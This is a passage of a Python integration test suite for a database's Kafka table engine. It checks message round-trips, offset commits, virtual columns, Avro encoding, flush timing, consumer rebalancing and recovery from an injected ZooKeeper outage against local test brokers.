        except QueryRuntimeException as e:
            if 'Local: Timed out.' in str(e):
                continue
            else:
                raise

    # Consume until all 50 produced messages have been seen.
    messages = []
    while True:
        messages.extend(kafka_consume(kafka_cluster, 'insert1'))
        if len(messages) == 50:
            break

    kafka_check_result('\n'.join(messages), True)
def test_kafka_produce_consume(kafka_cluster):
    # Round-trip under concurrency: 16 threads INSERT into a Kafka engine table
    # while a materialized view consumes the same topic back into test.view.
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'insert2',
                     kafka_group_name = 'insert2',
                     kafka_format = 'TSV',
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')

    messages_num = 10000

    def insert():
        # Each worker inserts the same messages_num rows in one statement; the
        # INSERT is retried on producer timeouts ('Local: Timed out.'), any
        # other error is fatal.
        values = []
        for i in range(messages_num):
            values.append("({i}, {i})".format(i=i))
        values = ','.join(values)

        while True:
            try:
                instance.query("INSERT INTO test.kafka VALUES {}".format(values))
                break
            except QueryRuntimeException as e:
                if 'Local: Timed out.' in str(e):
                    continue
                else:
                    raise

    threads = []
    threads_num = 16
    for _ in range(threads_num):
        threads.append(threading.Thread(target=insert))
    for thread in threads:
        # Stagger thread start-up a little to vary the interleaving per run.
        time.sleep(random.uniform(0, 1))
        thread.start()

    # Wait until every row from every thread has been consumed into the view.
    while True:
        result = instance.query('SELECT count() FROM test.view')
        time.sleep(1)
        if int(result) == messages_num * threads_num:
            break

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')

    for thread in threads:
        thread.join()

    assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_commit_on_block_write(kafka_cluster):
    # Offsets must be committed per written block: after the Kafka table is
    # dropped and re-created mid-stream with the same consumer group, rows that
    # already reached test.view must not be consumed a second time.
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'block',
                     kafka_group_name = 'block',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 100,
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')

    cancel = threading.Event()
    # One-element list used as a mutable counter shared with the producer thread.
    i = [0]

    def produce():
        # Batches of 101 messages — deliberately not a multiple of
        # kafka_max_block_size (100), so blocks straddle message batches.
        while not cancel.is_set():
            messages = []
            for _ in range(101):
                messages.append(json.dumps({'key': i[0], 'value': i[0]}))
                i[0] += 1
            kafka_produce(kafka_cluster, 'block', messages)

    kafka_thread = threading.Thread(target=produce)
    kafka_thread.start()

    # Wait until at least one block has been written to the view.
    while int(instance.query('SELECT count() FROM test.view')) == 0:
        time.sleep(1)

    cancel.set()

    # Drop and re-create the Kafka table; consumption should resume from the
    # offsets committed for the blocks already written.
    instance.query('''
        DROP TABLE test.kafka;
    ''')

    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'block',
                     kafka_group_name = 'block',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 100,
                     kafka_row_delimiter = '\\n';
    ''')

    # Wait until every produced key has arrived at least once.
    while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
        time.sleep(1)

    # 1 iff there are no duplicate keys in the view.
    result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')

    kafka_thread.join()

    assert result == 1, 'Messages from kafka get duplicated!'
def test_kafka_virtual_columns2(kafka_cluster):
    """Check all Kafka virtual columns, including _timestamp_ms and _headers,
    across two topics with two partitions each (2 consumers).
    """
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_config = {
        # default retention, since predefined timestamp_ms is used.
        'retention.ms': '-1',
    }
    kafka_create_topic(admin_client, "virt2_0", num_partitions=2, config=topic_config)
    kafka_create_topic(admin_client, "virt2_1", num_partitions=2, config=topic_config)

    instance.query('''
        CREATE TABLE test.kafka (value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'virt2_0,virt2_1',
                     kafka_group_name = 'virt2',
                     kafka_num_consumers = 2,
                     kafka_format = 'JSONEachRow';
        CREATE MATERIALIZED VIEW test.view Engine=Log AS
        SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
    ''')

    # Fix: use the kafka_cluster fixture parameter (was the module-level
    # `cluster` global), consistent with every other test in this file.
    producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)

    # Fixed keys/timestamps/headers so the expected TSV below is deterministic.
    producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
                  headers=[('content-encoding', b'base64')])
    producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
                  headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
    producer.flush()

    producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
                  headers=[('b', b'b'), ('a', b'a')])
    producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
                  headers=[('a', b'a'), ('b', b'b')])
    producer.flush()

    producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
    producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
    producer.flush()

    producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
    producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
    producer.flush()

    # Two messages per partition, four topic/partition pairs in total.
    instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)

    members = describe_consumer_group(kafka_cluster, 'virt2')
    # pprint.pprint(members)
    # members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
    # members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'

    result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)

    expected = '''\
1	k1	virt2_0	0	0	1577836801	1577836801001	['content-encoding']	['base64']
2	k2	virt2_0	0	1	1577836802	1577836802002	['empty_value','','','repetition','repetition']	['','empty name','','1','2']
3	k3	virt2_0	1	0	1577836803	1577836803003	['b','a']	['b','a']
4	k4	virt2_0	1	1	1577836804	1577836804004	['a','b']	['a','b']
5	k5	virt2_1	0	0	1577836805	1577836805005	[]	[]
6	k6	virt2_1	0	1	1577836806	1577836806006	[]	[]
7	k7	virt2_1	1	0	1577836807	1577836807007	[]	[]
8	k8	virt2_1	1	1	1577836808	1577836808008	[]	[]
'''

    assert TSV(result) == TSV(expected)

    instance.query('''
        DROP TABLE test.kafka;
        DROP TABLE test.view;
    ''')
    kafka_delete_topic(admin_client, "virt2_0")
    kafka_delete_topic(admin_client, "virt2_1")
    instance.rotate_logs()
def test_kafka_produce_key_timestamp(kafka_cluster):
    """INSERT rows with explicit _key/_timestamp and verify they round-trip through Kafka."""
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_name = "insert3"
    kafka_create_topic(admin_client, topic_name)

    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'insert3',
                     kafka_group_name = 'insert3',
                     kafka_format = 'TSV',
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'insert3',
                     kafka_group_name = 'insert3',
                     kafka_format = 'TSV',
                     kafka_row_delimiter = '\\n';
        CREATE MATERIALIZED VIEW test.view Engine=Log AS
            SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
    ''')

    single_row = "INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))"
    instance.query(single_row.format(1, 1, 'k1', 1577836801))
    instance.query(single_row.format(2, 2, 'k2', 1577836802))
    # Rows 3 and 4 go in one multi-row INSERT.
    instance.query(
        "INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(
            3, 3, 'k3', 1577836803, 4, 4, 'k4', 1577836804))
    instance.query(single_row.format(5, 5, 'k5', 1577836805))

    instance.wait_for_log_line("Committed offset 5")

    result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)

    # logging.debug(result)

    expected = '''\
1	1	k1	1577836801	k1	insert3	0	0	1577836801
2	2	k2	1577836802	k2	insert3	0	1	1577836802
3	3	k3	1577836803	k3	insert3	0	2	1577836803
4	4	k4	1577836804	k4	insert3	0	3	1577836804
5	5	k5	1577836805	k5	insert3	0	4	1577836805
'''

    assert TSV(result) == TSV(expected)

    kafka_delete_topic(admin_client, topic_name)
def test_kafka_insert_avro(kafka_cluster):
    """INSERT Avro-encoded rows into a Kafka table and decode the produced messages back."""
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_config = {
        # default retention, since predefined timestamp_ms is used.
        'retention.ms': '-1',
    }
    kafka_create_topic(admin_client, "avro1", config=topic_config)

    instance.query('''
        DROP TABLE IF EXISTS test.kafka;
        CREATE TABLE test.kafka (key UInt64, value UInt64, _timestamp DateTime('UTC'))
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'avro1',
                     kafka_group_name = 'avro1',
                     kafka_commit_on_select = 1,
                     kafka_format = 'Avro';
    ''')

    instance.query("INSERT INTO test.kafka select number*10 as key, number*100 as value, 1636505534 as _timestamp from numbers(4) SETTINGS output_format_avro_rows_in_file = 2, output_format_avro_codec = 'deflate'")

    # 4 rows at 2 rows per Avro file -> exactly 2 Kafka messages expected.
    messages = []
    while len(messages) != 2:
        messages.extend(kafka_consume(kafka_cluster, 'avro1', needDecode = False, timestamp = 1636505534))

    result = ''.join(decode_avro(raw) + '\n' for raw in messages)

    expected_result = """{'key': 0, 'value': 0, '_timestamp': 1636505534}
{'key': 10, 'value': 100, '_timestamp': 1636505534}
{'key': 20, 'value': 200, '_timestamp': 1636505534}
{'key': 30, 'value': 300, '_timestamp': 1636505534}
"""
    assert (result == expected_result)
def test_kafka_produce_consume_avro(kafka_cluster):
    """Round-trip Avro rows: writer Kafka table -> topic -> reader Kafka table -> MV."""
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_name = "insert_avro"
    kafka_create_topic(admin_client, topic_name)

    num_rows = 75

    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.kafka;
        DROP TABLE IF EXISTS test.kafka_writer;
        CREATE TABLE test.kafka_writer (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'avro',
                     kafka_group_name = 'avro',
                     kafka_format = 'Avro';
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'avro',
                     kafka_group_name = 'avro',
                     kafka_format = 'Avro';
        CREATE MATERIALIZED VIEW test.view Engine=Log AS
            SELECT key, value FROM test.kafka;
    ''')

    instance.query("INSERT INTO test.kafka_writer select number*10 as key, number*100 as value from numbers({num_rows}) SETTINGS output_format_avro_rows_in_file = 7".format(num_rows=num_rows))

    # 75 rows at 7 rows per Avro file -> ceil(75/7) = 11 committed offsets.
    instance.wait_for_log_line("Committed offset {offset}".format(offset=math.ceil(num_rows/7)))

    rows_in_view = instance.query("SELECT COUNT(1) FROM test.view", ignore_error=True)
    assert (int(rows_in_view) == num_rows)

    max_key_in_view = instance.query("SELECT max(key) FROM test.view", ignore_error=True)
    assert (int(max_key_in_view) == (num_rows - 1) * 10)

    kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_time(kafka_cluster):
    # A slow trickle of messages (about one per 0.8 s) must still be flushed to
    # the target table by the flush timer, not only when a full block
    # (kafka_max_block_size = 100) accumulates.
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_name = "flush_by_time"
    kafka_create_topic(admin_client, topic_name)

    # NOTE(review): the DDL batch below also contains a bare SELECT from
    # test.kafka — presumably intentional (consumes/commits once before the MV
    # exists); confirm.
    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'flush_by_time',
                     kafka_group_name = 'flush_by_time',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 100,
                     kafka_row_delimiter = '\\n';
        SELECT * FROM test.kafka;
        CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
            ENGINE = MergeTree()
            ORDER BY key;
    ''')

    cancel = threading.Event()

    def produce():
        # Produce one single-row message roughly every 0.8 s until cancelled.
        while not cancel.is_set():
            messages = []
            messages.append(json.dumps({'key': 0, 'value': 0}))
            kafka_produce(kafka_cluster, 'flush_by_time', messages)
            time.sleep(0.8)

    kafka_thread = threading.Thread(target=produce)
    kafka_thread.start()

    instance.query('''
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')

    # Let the flush timer fire; the asserted query expects exactly two distinct
    # insert timestamps (two flushes) and at least 15 rows within this window.
    time.sleep(18)

    result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')

    cancel.set()
    kafka_thread.join()

    # kafka_cluster.open_bash_shell('instance')

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')

    assert TSV(result) == TSV('1	1')
    kafka_delete_topic(admin_client, topic_name)
def test_kafka_flush_by_block_size(kafka_cluster):
    # The first flush must happen as soon as kafka_max_block_size (100) rows
    # accumulate, well before kafka_flush_interval_ms (120 s) expires.
    # The producer thread is intentionally started before the tables exist.
    cancel = threading.Event()

    def produce():
        # Flood the topic with one-row messages until cancelled.
        while not cancel.is_set():
            messages = []
            messages.append(json.dumps({'key': 0, 'value': 0}))
            kafka_produce(kafka_cluster, 'flush_by_block_size', messages)

    kafka_thread = threading.Thread(target=produce)
    kafka_thread.start()

    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'flush_by_block_size',
                     kafka_group_name = 'flush_by_block_size',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 100,
                     kafka_poll_max_batch_size = 1,
                     kafka_flush_interval_ms = 120000, /* should not flush by time during test */
                     kafka_row_delimiter = '\\n';
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')

    # Wait for Kafka engine to consume this data (first part appears in test.view).
    while 1 != int(instance.query(
            "SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
        time.sleep(0.5)

    cancel.set()
    kafka_thread.join()

    # More flushes can happen during the test; check only the result of the
    # first flush (the part named all_1_1_0).
    result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
    # logging.debug(result)

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')

    # 100 = the first poll should return exactly 100 messages (and rows),
    # without waiting for stream_flush_interval_ms.
    assert int(
        result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
    """Feed bulk multi-row messages into a 10-partition topic; nothing may be lost or duplicated."""
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_name = "topic_with_multiple_partitions2"
    kafka_create_topic(admin_client, topic_name, num_partitions=10)

    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'topic_with_multiple_partitions2',
                     kafka_group_name = 'topic_with_multiple_partitions2',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 211,
                     kafka_flush_interval_ms = 500;
        CREATE TABLE test.view (key UInt64, value UInt64)
            ENGINE = MergeTree()
            ORDER BY key;
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka;
    ''')

    # 1000 messages, each packing a random number (3..9) of JSON rows with
    # globally unique sequential keys.
    count = 0
    messages = []
    for _ in range(1000):
        batch = []
        for _ in range(random.randrange(3, 10)):
            count += 1
            batch.append(json.dumps({'key': count, 'value': count}))
        messages.append("\n".join(batch))
    kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)

    instance.wait_for_log_line('kafka.*Stalled', repetitions=5)

    result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
    logging.debug(result)
    assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')
    kafka_delete_topic(admin_client, topic_name)
def test_kafka_rebalance(kafka_cluster):
    """Exercise consumer-group rebalancing.

    Creates 11 Kafka tables in one consumer group one by one (each creation
    forces a rebalance), then drops all but the last one (more rebalances) and
    verifies that test.destination contains every produced key exactly once.
    """
    NUMBER_OF_CONCURRENT_CONSUMERS = 11  # fix: name typo (was CONSURRENT)

    instance.query('''
        DROP TABLE IF EXISTS test.destination;
        CREATE TABLE test.destination (
            key UInt64,
            value UInt64,
            _topic String,
            _key String,
            _offset UInt64,
            _partition UInt64,
            _timestamp Nullable(DateTime('UTC')),
            _consumed_by LowCardinality(String)
        )
        ENGINE = MergeTree()
        ORDER BY key;
    ''')

    # kafka_cluster.open_bash_shell('instance')
    # time.sleep(2)

    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
    topic_name = "topic_with_multiple_partitions"
    kafka_create_topic(admin_client, topic_name, num_partitions=11)

    cancel = threading.Event()

    # One-element list: mutable message counter shared with the producer thread.
    msg_index = [0]

    def produce():
        # Produce batches of 59 uniquely-keyed messages until cancelled.
        while not cancel.is_set():
            messages = []
            for _ in range(59):
                messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
                msg_index[0] += 1
            kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)

    kafka_thread = threading.Thread(target=produce)
    kafka_thread.start()

    # Bring consumers up one at a time; every new member triggers a rebalance.
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
        table_name = 'kafka_consumer{}'.format(consumer_index)
        logging.debug(("Setting up {}".format(table_name)))

        instance.query('''
            DROP TABLE IF EXISTS test.{0};
            DROP TABLE IF EXISTS test.{0}_mv;
            CREATE TABLE test.{0} (key UInt64, value UInt64)
                ENGINE = Kafka
                SETTINGS kafka_broker_list = 'kafka1:19092',
                         kafka_topic_list = 'topic_with_multiple_partitions',
                         kafka_group_name = 'rebalance_test_group',
                         kafka_format = 'JSONEachRow',
                         kafka_max_block_size = 33,
                         kafka_flush_interval_ms = 500;
            CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
                SELECT
                    key,
                    value,
                    _topic,
                    _key,
                    _offset,
                    _partition,
                    _timestamp,
                    '{0}' as _consumed_by
                FROM test.{0};
        '''.format(table_name))
        # kafka_cluster.open_bash_shell('instance')
        # Waiting for test.kafka_consumerX to start consume ...
        instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))

    cancel.set()

    # I leave last one working by intent (to finish consuming after all rebalances)
    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS - 1):
        logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
        instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))

    # logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
    # kafka_cluster.open_bash_shell('instance')

    # Wait until the surviving consumer has drained everything that was produced.
    while 1:
        messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
        if messages_consumed >= msg_index[0]:
            break
        time.sleep(1)
        logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))

    logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))

    # Some queries to debug...
    # SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
    # select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
    # SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
    # select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
    # select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
    # SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
    # CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
    #             kafka_topic_list = 'topic_with_multiple_partitions',
    #             kafka_group_name = 'rebalance_test_group_reference',
    #             kafka_format = 'JSONEachRow',
    #             kafka_max_block_size = 100000;
    #
    # CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
    #     SELECT  key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
    # FROM test.reference;
    #
    # select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';

    # 1 iff no key was consumed twice.
    result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))

    for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
        logging.debug(("kafka_consumer{}".format(consumer_index)))
        table_name = 'kafka_consumer{}'.format(consumer_index)
        instance.query('''
            DROP TABLE IF EXISTS test.{0};
            DROP TABLE IF EXISTS test.{0}_mv;
        '''.format(table_name))

    instance.query('''
        DROP TABLE IF EXISTS test.destination;
    ''')

    kafka_thread.join()

    assert result == 1, 'Messages from kafka get duplicated!'
    kafka_delete_topic(admin_client, topic_name)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
    # A ZooKeeper outage injected while the materialized view pushes a block
    # into a Replicated table must not leave holes: after the connection heals,
    # all 22 keys must end up in test.view exactly once.
    messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
    kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)

    instance.query('''
        DROP TABLE IF EXISTS test.view;
        DROP TABLE IF EXISTS test.consumer;
        CREATE TABLE test.kafka (key UInt64, value String)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'no_holes_when_write_suffix_failed',
                     kafka_group_name = 'no_holes_when_write_suffix_failed',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 20,
                     kafka_flush_interval_ms = 2000;
        CREATE TABLE test.view (key UInt64, value String)
            ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
            ORDER BY key;
    ''')

    # init PartitionManager (it starts container) earlier
    pm = PartitionManager()

    # sleepEachRow slows the MV down so we can inject the failure mid-write.
    instance.query('''
        CREATE MATERIALIZED VIEW test.consumer TO test.view AS
            SELECT * FROM test.kafka
            WHERE NOT sleepEachRow(0.25);
    ''')

    instance.wait_for_log_line("Polled batch of 20 messages")
    # the tricky part here is that disconnect should happen after write prefix, but before write suffix
    # we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
    # while materialized view is working to inject zookeeper failure
    pm.drop_instance_zk_connections(instance)
    instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while pushing to view")
    pm.heal_all()
    instance.wait_for_log_line("Committed offset 22")

    result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
    logging.debug(result)

    # kafka_cluster.open_bash_shell('instance')

    instance.query('''
        DROP TABLE test.consumer;
        DROP TABLE test.view;
    ''')

    assert TSV(result) == TSV('22\t22\t22')
def test_exception_from_destructor(kafka_cluster):
    """The server must stay alive across creating/dropping Kafka tables whose
    usage raises (exceptions thrown on the storage teardown path must not kill it).
    """
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value String)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'xyz',
                     kafka_group_name = '',
                     kafka_commit_on_select = 1,
                     kafka_format = 'JSONEachRow';
    ''')
    # This SELECT is expected to fail (the helper asserts an error is returned);
    # presumably due to the empty consumer group name — confirm.
    instance.query_and_get_error('''
        SELECT * FROM test.kafka;
    ''')
    instance.query('''
        DROP TABLE test.kafka;
    ''')

    # Same table again, this time dropped without ever selecting from it.
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value String)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'xyz',
                     kafka_group_name = '',
                     kafka_format = 'JSONEachRow';
    ''')
    instance.query('''
        DROP TABLE test.kafka;
    ''')

    # kafka_cluster.open_bash_shell('instance')

    # If the server survived all of the above, this trivial query succeeds.
    assert TSV(instance.query('SELECT 1')) == TSV('1')
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
    # When the Kafka table is dropped while messages are still arriving, offsets
    # must be committed so that a re-created table in the same consumer group
    # resumes without losing or duplicating any rows.
    messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
    kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)

    instance.query('''
        DROP TABLE IF EXISTS test.destination SYNC;
        CREATE TABLE test.destination (
            key UInt64,
            value UInt64,
            _topic String,
            _key String,
            _offset UInt64,
            _partition UInt64,
            _timestamp Nullable(DateTime('UTC')),
            _consumed_by LowCardinality(String)
        )
        ENGINE = MergeTree()
        ORDER BY key;
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
                     kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 1000,
                     kafka_flush_interval_ms = 1000;
        CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
            SELECT
                key,
                value,
                _topic,
                _key,
                _offset,
                _partition,
                _timestamp
            FROM test.kafka;
    ''')

    # Waiting for test.kafka_consumer to start consume
    instance.wait_for_log_line('Committed offset [0-9]+')

    cancel = threading.Event()

    # One-element list: mutable counter shared with the producer thread.
    # Starts at 2 because key 1 was already produced above.
    i = [2]

    def produce():
        # Produce batches of 113 messages every 0.5 s until cancelled.
        while not cancel.is_set():
            messages = []
            for _ in range(113):
                messages.append(json.dumps({'key': i[0], 'value': i[0]}))
                i[0] += 1
            kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
            time.sleep(0.5)

    kafka_thread = threading.Thread(target=produce)
    kafka_thread.start()
    time.sleep(4)

    # Drop the Kafka table mid-stream ...
    instance.query('''
        DROP TABLE test.kafka SYNC;
    ''')

    # ... and re-create it (same group, bigger block size); it must resume from
    # the committed offsets.
    instance.query('''
        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
                     kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 10000,
                     kafka_flush_interval_ms = 1000;
    ''')

    cancel.set()
    instance.wait_for_log_line('kafka.*Stalled', repetitions=5)

    # kafka_cluster.open_bash_shell('instance')
    # SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;

    result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
    logging.debug(result)

    instance.query('''
